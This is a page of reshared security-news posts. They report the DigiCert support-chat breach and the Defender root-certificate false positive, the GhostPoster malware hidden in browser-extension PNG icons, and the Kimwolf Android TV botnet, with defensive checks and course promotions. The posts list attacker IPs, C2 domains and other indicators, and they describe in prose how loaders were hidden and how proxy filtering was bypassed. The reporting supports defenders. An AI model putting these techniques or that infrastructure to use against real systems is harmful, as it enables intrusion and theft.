Industrial Web Development

05/05/2026

Microsoft Defender deleted DigiCert root certificates from Windows machines worldwide and flagged them as Trojan:Win32/Cerdigent.A!dha. Those certificates tell your browser which websites to trust, and tell Windows which software is safe to run. DigiCert was hacked through a screensaver file in a customer support chat, Microsoft tried to respond, and Defender ended up deleting the very thing it was trying to protect.

DigiCert is a certificate authority. A certificate is what tells your browser that a website is real, and what tells Windows that software was actually built by the company whose name is on it. When you see a padlock in your browser, a certificate made that happen. When Windows decides whether to run a program without warning you, it checked a certificate. DigiCert issues more of those certificates than almost anyone else. When you log into your bank, check your email, or install software from a trusted vendor, there is a reasonable chance a DigiCert certificate was involved somewhere in that process.

On April 2, 2026, an attacker contacted DigiCert's support team through a normal customer chat and sent a ZIP file disguised as a screenshot. Inside was a .scr file. Windows screensavers, the fish-swimming-across-your-monitor format from the 1990s. Windows runs them exactly like any other program.

The customer support chat made it even easier. According to DigiCert's own incident report, the chat allowed anyone from outside to send files directly to staff members who had access to certificate systems. No restrictions on file type, no sandboxing, no content inspection. The .scr file did not need to be clever. The system just let it through.

This attack has a name: social engineering. The attacker did not write an exploit or find a vulnerability. They posed as a customer, sent a file, and waited for someone to open it. Social engineering has been around longer than most of the security tools built to stop it, and it still works just as well. The most sophisticated security stack in the world ends at the person sitting behind the keyboard.

CrowdStrike and other security software blocked four attempts before the fifth one got through on April 2 and compromised the first machine. DigiCert detected that themselves and contained it by April 3. What they missed was a second machine. On April 4, the attacker used the same delivery method on a second support analyst. Nobody found that second machine until April 14, because the CrowdStrike EDR agent on that machine was malfunctioning. EDR software, which stands for Endpoint Detection and Response, watches a machine for suspicious activity and sends those alerts to a central dashboard where a security team can act on them. This one was running. It just was not sending its alerts anywhere. In between, on April 5, an external researcher reported that DigiCert certificates were being used to sign malware in active campaigns. That report is what triggered the deeper investigation that uncovered the second machine.

The attacker left with initialization codes for code-signing certificates.

A code-signing certificate is the digital signature a developer puts on software to prove it came from them and has not been changed since. Windows uses that signature to decide whether to warn you before running something. If the signature checks out, SmartScreen, the part of Windows that screens unfamiliar software, stays quiet and lets it run. Extended Validation certificates, EV certificates, are the top level of that system. You jump through more hoops to get one, and the certificate lists a verified company name. Since March 2024 Microsoft changed how SmartScreen handles EV certificates, so they no longer bypass warnings automatically. But an EV certificate in the name of Lenovo or Kingston still looks very different to a user than an unknown publisher. That is the advantage the attacker was after.

The attacker used the stolen codes to generate EV certificates in the names of real companies: Lenovo, Kingston, Shuttle Inc, and Palit Microsystems. Those certificates were then used to sign Zhong Stealer.

Zhong Stealer has been around since December 2024, when it first showed up targeting people at crypto exchanges and fintech companies. The delivery method back then looked almost identical to how DigiCert got hit: attackers posed as customers, opened support tickets on platforms like Zendesk, and pushed the malware to whoever was handling the ticket. Once on a machine, the malware connects to its Alibaba Cloud server in Hong Kong and downloads a second payload called down.exe. That file disguises itself as a BitDefender Security updater, signed with a stolen certificate so it looks like a legitimate software update. From there Zhong Stealer installs itself and goes to work.

Despite the name, it works more like a remote access tool than a stealer. When it runs, it first checks which languages the system uses, so it skips machines in countries the attackers want to leave alone. It connects to a server in Hong Kong on Alibaba Cloud over port 1311, a non-standard port that most network monitoring tools ignore. It adds itself to the Windows Task Scheduler so it runs again after every reboot. It runs a keylogger alongside a clipboard monitor that records everything copied. For anyone handling crypto wallets or financial accounts, that clipboard monitor is where the real damage happens because wallet addresses and passwords move through the clipboard constantly.

Security researchers including Squiblydoo, MalwareHunterTeam, and g0njxa connected the stolen certificates to a group tracked under several names. Qi'anxin calls them APT-Q-27. Sophos calls them Dragon Breath. They also go by GoldenEyeDog. The group has been active since at least 2020, targeting online gambling platforms, gaming communities, and the overseas Chinese community. They distribute fake versions of real apps, Telegram, VPN clients, messaging software, all working normally while running malware underneath.

In cybersecurity, attribution is one of the hardest problems to get right. IP addresses can be faked. Tools get shared between groups. Code patterns overlap in ways that mislead researchers. The evidence shows certificates from this campaign signed Zhong Stealer and that the code patterns inside the malware match what researchers have seen from APT-Q-27 before. The IOCs that tie them together are specific enough to hunt for directly:

→ Mutex: `Global\DHGGlobalMutex`
→ Registry key (keylogger): `HKCU\offlinekey\open`
→ Registry key (clipboard monitor): `HKCU\offlinekey\clipboard`

Whether the same group attacked DigiCert's support staff is a question nobody has answered yet.

DigiCert revoked 60 code-signing certificates between April 14 and 17. Twenty-seven were directly tied to the attacker. The other 33 were pulled as a precaution. The IP addresses the attacker used were traced and logged: 82.23.186.8, 154.12.185.32, 45.144.227.12, 203.160.68.2, 154.12.185.30, 62.197.153.45, and 45.144.227.29. DigiCert's own incident report also notes that Zhong Stealer was signed with stolen certificates from other certificate authorities too, not just DigiCert. The campaign was broader than one breach.

Microsoft responded by adding a detection to Defender targeting the stolen certificates. Security Intelligence update 1.449.424.0 shipped April 30, 2026 with a signature called Trojan:Win32/Cerdigent.A!dha. The detection went looking for DigiCert-related entries in the Windows registry, the database Windows uses to store system settings, specifically in the section where trusted certificates live:

HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates

It matched the wrong certificates.

A code-signing certificate belongs to one company and signs one piece of software. A root certificate belongs to the certificate authority itself and is the foundation the whole system builds on. When a browser checks whether a website certificate is real, it follows a chain all the way back to a root certificate. Root certificates come pre-installed on every operating system because everything else depends on them being there. The two certificates Defender flagged were DigiCert Assured ID Root CA and DigiCert Trusted Root G4, both sitting in the Windows trust store for years with thumbprints matching exactly what DigiCert publishes on their own website:

→ DigiCert Assured ID Root CA: `0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43`
→ DigiCert Trusted Root G4: `DDFB16CD4931C973A2037D3FC83A4D7D775D05E4`

Neither had anything to do with the stolen code-signing certificates or Zhong Stealer. Defender removed them anyway.

Without those root certificates, browsers throw errors on sites that use DigiCert-backed certificates, applications that verify software signatures stop working, and corporate systems that use certificate-based logins break. On May 3, 2026, reports started flooding in from admins across Windows 11 and Windows Server environments. Some people, looking at a high-severity Trojan alert marked as remediated, assumed they were infected and reinstalled Windows completely.

To check whether a machine was affected:

```
certutil -store AuthRoot | findstr -i "digicert"
```

If DigiCert Assured ID Root CA and DigiCert Trusted Root G4 show up in the output, the certificates are there. If they do not, the machine was hit.

The fix is updating Defender definitions to Security Intelligence version 1.449.430.0 or later. That version stops the false detection and automatically restores any certificates that were removed. For admins managing larger environments, this Advanced Hunting query checks whether certificates have been restored across managed devices:

```
DeviceRegistryEvents
| where ActionType == "RegistryKeyCreated"
| where Timestamp > datetime(2026-05-03T04:00:00)
| project Timestamp, DeviceName, ActionType, InitiatingProcessFileName
| order by Timestamp desc
```

What this whole chain shows is how far one misconfigured EDR agent and one unfiltered support chat can take an attacker. The entry point was a file people associate with fish swimming across a monitor. The stolen certificates signed malware that had already been running since late 2024. And when Microsoft moved to stop the damage, the fix deleted the very certificates it was trying to protect. Ask yourself what else is sitting undetected right now in places that should have caught it months ago.

Social engineering, credential theft with tools like Mimikatz, and persistence techniques like scheduled tasks and registry keys are all covered step by step in the ethical hacking course:

→ https://www.udemy.com/course/ethical-hacking-complete-course-zero-to-expert/?couponCode=MAY2026

Hacking is not a hobby but a way of life. 🎯

Read the full breakdown:
→ https://hackingpassion.com/digicert-breach-defender-cerdigent-false-positive/

Research & writing: Jolanda de Koff | HackingPassion.com
Sharing is fine. Copying without credit is not.

04/28/2026

I learned to not trust computers, operating systems, software, plugins, online services, or phones to not royally mess things up decades before “AI”. The amount of people putting their lives, jobs, and companies in its hands is crazy. ⬇️⬇️⬇️

04/27/2026

"Our large-scale experiment with 19 LLMs reveals that current models degrade documents during delegation: even frontier models (Gemini 3.1 Pro, Claude 4.6 Opus, GPT 5.4) corrupt an average of 25% of document content by the end of long workflows, with other models failing more severely. Additional experiments reveal that agentic tool use does not improve performance on DELEGATE-52, and that degradation severity is exacerbated by document size, length of interaction, or presence of distractor files. Our analysis shows that current LLMs are unreliable delegates: they introduce sparse but severe errors that silently corrupt documents, compounding over long interaction." 👇👇👇

03/13/2026

An additional issue is that in training, models were rewarded more points for giving a confident answer. They received no points for saying "I do not know" or for asking for more information. The end result is an "intelligence" rewarded for guessing, lying, and being confidently wrong. Letting it write a tech paper or your ad content is hazardous, expecting it to be on-brand with your visual ads is crazy talk right now, and thinking it will make a good customer service agent is self-sabotage, but letting it give you life advice or become your best friend is sheer lunacy.

03/13/2026

Asus routers and IOT devices ('smart' fridges, thermostats, light bulbs, etc..) are a huge risk to security. Even if it is worth it at home to know what is in the fridge from miles away or to not have to walk to the thermostat, these things are not good for any workplace.

Victims of the KadNap botnet are spread throughout the world

02/17/2026

Absolutely do not ever click these. The social Security Admin is never going to email you statements.

For further information please re-read this posting.

02/11/2026

Trying to admin DNS records and payment methods on a domain at Godaddy and clicking "manage" forced me onto this Airo page that tried designing some junk AI BS garbage website for me. That would have been annoying enough but it also created a website 'product'.... and... it even pointed my DNS records to the crapsite I never asked for and created a lot of DNS entries for a payment system, even signed me up for one... all from clicking one button expecting things to work the way they always had in the past, not expecting to be hijacked by a junk website builder.

Anyway... Beware Godaddy users when trying to do anything with your domains. I moved 99% of domains and hosting away from them a while ago, but was slower moving on my personal domains and sites.

Fix: Specifically click "DNS" instead of "Manage", then onboard the domain into Cloudflare and change the nameservers to your Cloudflare nameservers. From there you can unlock the domain, click "transfer to another registrar", and save that code. Wait until the domain shows up in your Cloudflare panel under "Transfer Domains", but keep checking dcc.godaddy. com/control/transfers for an opportunity to release the domain right away - within about an hour or less you'll be able to transfer the domains to Cloudflare and only pay the $9.99 a year registration fees from there out, instead of Godaddy's $21 a year with every basic service being an add-on for $$$$. Yep, you get registration privacy, DNSSEC, and a lot of other bells and whistles for free from Cloudflare.

02/08/2026

We’re not yet where any of this is reliable. Personally, when I have nothing but AI chatbots for support, I turn to another company. Customers don’t appreciate it and worse, it seems a liability.

01/19/2026

Undetected for years.

Your browser extension logo just became malware. Not the code. The actual image file. A PNG icon sitting in your toolbar, looking normal, hiding JavaScript that takes over your browser. Over 1 million victims through GhostPoster. Part of a larger operation hitting 8.8 million. Seven years undetected. 🧐

Last week, researchers revealed the full scope of a campaign they call GhostPoster. Koi Security published the first findings in December 2025. LayerX followed up with additional discoveries on January 15, 2026. And it is worse than anyone thought.

The trick is simple but brilliant. Every browser extension has a logo. A tiny image people glance at and never think about. The attackers hid malicious code inside the PNG file, right after where the image data ends. The browser shows the icon normally. Security scanners see a valid image. But the extension reads its own logo, searches through the raw bytes for a marker, and runs whatever comes after.

The marker is three equals signs: ===

Some variants use four greater-than signs: >>>>

Everything after that marker is not image data. It is JavaScript waiting to run.

This is steganography. Hiding data inside something that looks innocent. Code reviewers checking the extension's JavaScript files find nothing. Automated scanners see nothing wrong. The malware lives inside an image that looks perfectly normal in the toolbar.

But they did not stop there.

The code in the logo is not the actual malware. It is just a loader. A small program that grabs the real payload from command servers. Primary server: liveupdt[.]com. Backup: dealctr[.]com.

The loader does not call home right away. It waits 48 hours. Even then, it only grabs the payload 10 percent of the time. Researchers watching network traffic might see nothing suspicious for days. The malware is patient. Inconsistent behavior is harder to catch.

When the payload finally arrives, it goes through custom encoding. Letters swap between uppercase and lowercase. Numbers 8 and 9 get exchanged. Then Base64 decoding. Then XOR encryption using a key from the extension's runtime ID. The result gets stored in browser storage. Persistence achieved.

What does the malware actually do?

It strips security headers from every website visited. Content-Security-Policy, gone. X-Frame-Options, gone. These headers protect against clickjacking and XSS attacks. The extension removes them silently on every page.

It injects Google Analytics tracking everywhere. Tracking ID: UA-60144933-8. It logs the extension installation date, how many days the victim has been infected, which shopping sites are visited, and a unique browser ID. Hidden div elements show up in pages with IDs like extwaigglbit and extwaiokist. Tracking data that scripts can read.

It hijacks affiliate links on Taobao[.]com and JD[.]com. Someone clicks a product link. The extension swaps it. The original affiliate gets nothing. The attackers get paid. The victim still ends up on the same product page. Still buys. The only difference is who earns the commission.

It injects invisible iframes that load attacker-controlled URLs for ad fraud, click fraud, and extra tracking. The iframes appear, do their job, and vanish after 15 seconds.

It bypasses CAPTCHA. One method fakes user interaction. Another loads an external solver. The malware needs to look human to keep running.

The campaign started on Microsoft Edge back in 2020. Then it spread to Firefox and Chrome. The extensions look useful.

→ Free VPN Forever with 16,000 installs
→ Google Translate in Right Click with 522,398 installs
→ Translate Selected Text with Google with 159,645 installs
→ Ads Block Ultimate with 48,078 installs
→ Floating Player PiP Mode with 40,824 installs

On Opera, a fake Google Translate extension by developer "charliesmithbons" reached nearly one million installs. Same infrastructure. Same malicious behavior. Still communicating with mitarchive[.]info and gmzdaily[.]com.

Free VPNs, translation tools, ad blockers, weather apps, and screenshot utilities. The categories people trust most.

But GhostPoster is not alone.

Researchers traced the infrastructure and found connections to two other campaigns. Same group. They call the threat actor DarkSpectre.

ShadyPanda hit 5.6 million users through Chrome and Edge. These extensions ran clean for three to five years. They earned Featured and Verified badges. Built trust. Then one update weaponized everything. One extension called WeTab, 3 million installs, tracks every URL visited, every search query at keystroke level, every mouse click with pixel coordinates, browser fingerprints, and page interactions. It sends everything to 17 domains including Baidu servers in China.

The Zoom Stealer hit 2.2 million users through extensions that access 28 video platforms including Zoom, Microsoft Teams, Google Meet, Cisco WebEx, and GoToWebinar. These extensions scraped meeting URLs with passwords, participant lists, speaker names, titles, bios, photos, and company info. They stream meeting data in real time over WebSocket connections. Not consumer fraud. Corporate espionage.

Combined: 8.8 million victims over seven years.

There are still 85 or more sleeper extensions sitting in browser stores right now. They look legitimate because they are legitimate. For now. They are building trust, collecting users, earning badges. Waiting.

Researchers found signs pointing to China. Command servers on Alibaba Cloud. ICP registrations in Hubei Province. Chinese comments in the code. Development activity matching Chinese timezone patterns. Affiliate fraud targeting Chinese e-commerce platforms.

But here is the thing about attribution. In cybersecurity, attribution is one of the hardest problems. IP addresses can be spoofed. Tools can be shared. Languages in code can be faked. What we know for sure is how the malware works. Not necessarily who is behind it. This is my opinion.

Mozilla and Microsoft removed the extensions after disclosure. Google confirmed removal too. But store takedowns only stop new downloads. Extensions already installed keep running. The malware is still active on devices right now.

How to protect yourself.

→ Check your installed extensions in Chrome, Edge, and Firefox
→ Remove any VPN, translator, or ad blocker you do not recognize
→ Check chrome://extensions or about:addons for anything suspicious
→ Watch for high CPU usage or strange network traffic from your browser

Fewer extensions, smaller attack surface. That simple.

The extensions that promised privacy delivered surveillance. The icons that looked trustworthy hid code. And the gap between what security tools see and what actually runs is exactly where GhostPoster lives.

GhostPoster hid malware using steganography. I teach this technique and many more, from traffic analysis to reconnaissance to exploitation, in my ethical hacking course. Understanding how attackers think is the first step to stopping them:

→ https://www.udemy.com/course/ethical-hacking-complete-course-zero-to-expert/?couponCode=FEBRUARY26

(The link supports me directly as the instructor!)

Hacking is not a hobby but a way of life. 🎯

Article:
→ https://hackingpassion.com/ghostposter-malware-browser-extension-png-steganography/



Research & writing: Jolanda de Koff | HackingPassion.com
Sharing is fine. Copying without credit is not.

01/05/2026

A botnet just fired 1.7 billion DDoS commands in 72 hours. Attack capacity: nearly 30 Terabits per second. 2 million Android TV boxes sitting in living rooms across 222 countries and regions. And now we know how the attackers built it so fast. 🧐

The attackers didn't send phishing emails. They didn't trick anyone into downloading malware. They just bought access to a proxy service and walked right into home networks.

A few weeks ago, I wrote about Kimwolf and how massive this botnet has become. But researchers just revealed something even more disturbing: how they did it.

Between November 19 and 22, the botnet went crazy. It fired 1.7 billion DDoS attack commands in just three days, spraying attacks across the entire internet. Its control server briefly became the most visited domain on earth, surpassing Google in Cloudflare's global rankings. Researchers estimate its attack capacity at nearly 30 Terabits per second, and believe Kimwolf was behind the record-breaking 29.7 Tbps DDoS attack earlier this year.

Researchers found that 96% of the botnet's commands are for proxy services. The operators route criminal traffic through infected living room devices, and with 2 million endpoints, they're estimated to earn around $88,000 per month just from selling bandwidth.

Here's how it works.

Millions of phones and tablets run proxy apps, free VPNs, and cheap apps that promise something for nothing. What they actually do is turn the device into a relay. Other people pay to route their traffic through it, and the home IP address goes up for rent.

Normally, proxy services block access to local network addresses like 192.168.1.1, the router, and other devices in the house.

But researchers found a hole. Attackers created domains that pointed to local addresses. The proxy service looked up the domain, got what looked like a normal IP, and forwarded the request straight into the home network.

Once inside, they scanned for targets. And they found plenty.

Android TV boxes ship with a feature called Android Debug Bridge enabled. ADB is meant for factory testing. It gives full control over the device: read memory, write files, install software. No password required.

These boxes are sold everywhere, on Amazon, Walmart, and AliExpress. They cost anywhere from $40 to $400. They promise free streaming. What they deliver is a wide open door into the home network.

The attackers used the proxy tunnel to reach these devices. One command gave them full access, the malware was installed, and the device joined the botnet.

Infected models include:
→ SuperBOX
→ X96Q
→ MX10
→ TV BOX
→ SmartTV
→ Various no-name Android boxes
→ Digital photo frames with the Uhale app

The proxy service exploited was IPIDEA, based in China. They claim 100 million endpoints. Researchers found two-thirds of their Android devices had no authentication at all.

IPIDEA patched the hole after researchers reported it. But by then, 2 million devices were already compromised.

The botnet uses DNS-over-TLS to hide its communication from traditional security tools. It encrypts command server addresses with XOR obfuscation, so even intercepted traffic shows the wrong destination. When researchers took down its servers, the operators switched to blockchain. They now store their real server addresses on Ethereum Name Service domains that are far harder to seize or block.

After one takedown attempt, the Kimwolf operators responded: "we have 100s of servers keep trying LOL!"

They weren't bluffing. They rebuilt from almost nothing to 2 million bots in days, just by exploiting the proxy vulnerability.

Think about this scenario. A friend visits, connects to the WiFi, and their phone has some free VPN installed. That phone is now a proxy node. The home IP address appears on a proxy marketplace, attackers tunnel through, find the Android TV box, and infect it. The friend leaves, but the infection stays.

Proxy apps punch holes, cheap devices have no security, and the combination is a disaster.

Signs a device might be infected:
→ High network traffic for no reason
→ Device running hot when idle
→ Slower internet than usual
→ Strange outbound connections

Synthient built a page to check if an IP address was seen in Kimwolf traffic:
→ https://synthient.com/check

If a TV box matches one of these infected models, disconnect it. Not worth the risk.

This attack shows exactly why understanding home network security matters. I cover network fundamentals, how attackers find and exploit devices, and how traffic flows through systems in my ethical hacking course:
→ https://www.udemy.com/course/ethical-hacking-complete-course-zero-to-expert/?couponCode=FEBRUARY26

(The link supports me directly as the instructor!)

Hacking is not a hobby but a way of life. 🎯



Research & writing: Jolanda de Koff | HackingPassion.com
Sharing is fine. Copying without credit is not.